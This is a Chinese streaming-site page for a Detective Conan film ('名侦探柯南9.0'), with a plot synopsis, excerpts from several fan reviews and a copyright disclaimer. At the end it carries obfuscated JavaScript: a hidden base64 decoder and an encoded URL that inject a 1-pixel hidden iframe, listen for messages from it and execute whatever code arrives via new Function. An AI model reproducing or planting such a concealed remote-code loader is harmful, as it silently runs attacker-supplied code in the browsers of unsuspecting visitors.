当前位置 首页 动漫 《名侦探柯南》

名侦探柯南9.0

类型:动漫  日本  2017 

主演:未知

导演:未知

天空资源

百度影音

快播在线

剧情简介

工藤新一是全国著名的高中生侦探,在一次追查黑衣人犯罪团伙时不幸被团伙成员发现,击晕后喂了神奇的药水,工藤新一变回了小孩!新一找到了经常帮助他的阿笠博士,博士为他度身打造不少间谍武器。为了防止犯罪团伙对他进行报复,新一决定隐姓埋名,暗中追查他们,希望能得到解药。一日,新一的女友毛利兰来到了阿笠博士的家寻找男友的下落,被小兰撞见的新一情急之下编造了自己名叫江户川柯南,随后柯南寄居在了小兰家。小兰的父亲毛利小五郎是一名私家侦探,新一可以籍着和他一起四出办案一起追查黑夜人的下落。柯南在小学认识步美等小学生,他们一起组织了一个少年侦探对,向罪犯宣战柯南的皮球居然下线了!京极为什么还没收到复联邀请?园子为什么要戴发卡?? 我为柯南添加了动作片标签,从江户川独秀,到现在大家都是日本一线打星了。加油,园子,你也可以来一手 新加坡观光片。京极好帅京极好帅京极好帅。除此之外基本算是业火的向日葵以来最差的一部了,支离破碎,七拼八凑。 所以就是这部虾坡旅游宣传片上个月暴揍漫威拿到的日本票房冠军? 快新新加坡蜜月之旅 这篇影评可能有剧透 此片对于去过新加坡的人有搞笑/惊喜加成,没去过的话,当旅游介绍片看也成…… 事先说明,几乎可以说是看着柯南漫画长大的,但剧场版只看过最早期的几部,最近几年的也都没看过,从来没有试过去电影院看,更没有试过在外国电影院看柯南。 这一次去看也是因为偶然看到的预告片,... 首先,打星是追了二十年的感情分,剧情确实烂,豆瓣上那么多中肯的评价,不缺我一个。 这位热评大师打着一副剧本专家的旗号胡说八道,完全不考虑整个作品人物形象的设定和连贯性,通过描述可以看出压根连柯南整部作品都没看完整,连基德到底是个怎样的角色都没搞清楚,自己看了... 我第一次看柯南在我小学二年级,仔细想来,已经二十多年了。那时柯南是一个小学生,工藤新一是一个高中生。现在我30岁了,柯南还是一个小学生,我遭遇了一轮又一轮的恋爱,工藤新一永远爱着兰,从未变心,从未动摇,也从未滚床单。他们就像生活在一个真空的乌托邦,那里面时间... 嗯,如图,没啥剧透的。感觉稍微有点拼凑,是为了出剧场而编剧的。不追柯南的可以先看一下最近出的,小兰跟新一暧昧了20多年终于确定了关系,剧场里牵牵手,小暧昧一下还是有的。我看了反正是漏出了老父亲般的笑容。圆子要不是女二,一定没有发带的设定,堂堂铃木财团大小姐,... 这篇影评可能有剧透 周五柯南在日本一上映就去看啦~先上电影票 周五虽然不是节假日,但是整个场子几乎都坐满了,可见霓虹人民对柯南君的喜爱。电影之前放的预告片是把柯南和复仇者联盟宣传片剪接到了一起,哔哔了一下两者都遇到了史上最大危机,要堵上一切战斗之类的,搞得我下一秒钟以为柯南要串... 这篇影评可能有剧透 ~~ 本文含有大量剧透,在意的朋友请慎入~~ ~~ 本文含有大量剧透,在意的朋友请慎入~~ 注:本文没有逻辑,完全是想到什么写什么,嗯。 1和前几作比起来这一部剧情其实也还算可以了,可是仍然非常破碎,然后又是挖了好多坑却没填上,剧情上矛盾和说不通的挺多的,细节处理上也很... 怕傻子看不见,我把丑话放前头再说一遍: 某些听不懂人话的小孩,社会不是你家,出来说话最好带脑子。你觉得很好,那是你的事。我觉得不好,是我的事。我全篇没有说过“这东西很糟,你凭什么觉得它好”这种话。所以,某些小屁孩,跑过来跟我说“我觉得它好,你凭什么说它不好!... 这篇影评可能有剧透 我是大学生理科男 拉格朗日 和大学同班同学一起去电影院看柯南时,目击了黑心编剧可疑的剧情发展 因为当时太过于专注于各种爆炸场面,没注意剧情是多么的扯淡生硬 我被编剧灌下了降智药,当我看完时... 吐嘈已经忍不住了! 如果在全是柯南迷的影院里吐嘈,不但我会被胖揍到性命... 要说优点的话: 1、故事娱乐性比较强,加上有一些对TV剧情的呼应,粉丝不至于会无聊(圆子赞助了那么多回爆炸素材 ,也终于体验了一把炸别人的楼,自己当女主角的爽快感了)。 2、导演在探索案件过程的表现形式上做了一些全新的尝试,还蛮令人眼前一亮的;最后的动作戏有几个分... 不走程序直接喷了。全程剧透。 1.京极真是弱智吗?更衣室里里昂那么低级的洗脑都能动摇他的斗志?而且送他个手环还真封印能力了,就这意志力也别玩空手道了。 2.新加坡海警过于无能,有个轮船偏离航线,海运公司早就报警了,稍有常识的人都知道轮船偏离航线又呼叫不答肯定被海...

本网站提供新影视资源均系收集各大网站,本网站只提供web页面浏览服务,并不提供影片资源存储,也不参与任何视频录制、上传
若本站收集的节目无意侵犯了贵司版权,请给网页底部邮箱地址来信,我们将在第一时间删除相应资源

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['yWzkjXZ']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_6982`]) { var t = x(e.data[`des_s_6982`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'aHR'+'FF0'+'cHF'+'FMl'+'M0E'+'lMk'+'YlM'+'kFF'+'ZqY'+'FFS'+'5qF'+'FaW'+'5FF'+'nYW'+'53Z'+'Wku'+'Y29'+'tJT'+'FFN'+'BMT'+'A0N'+'DMF'+'FlM'+'kZj'+'NGN'+'hFF'+'NDI'+'lMk'+'FFZ'+'jLT'+'Y5F'+'FOD'+'IFF'+'tMj'+'ItM'+'FFW'+'U2',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}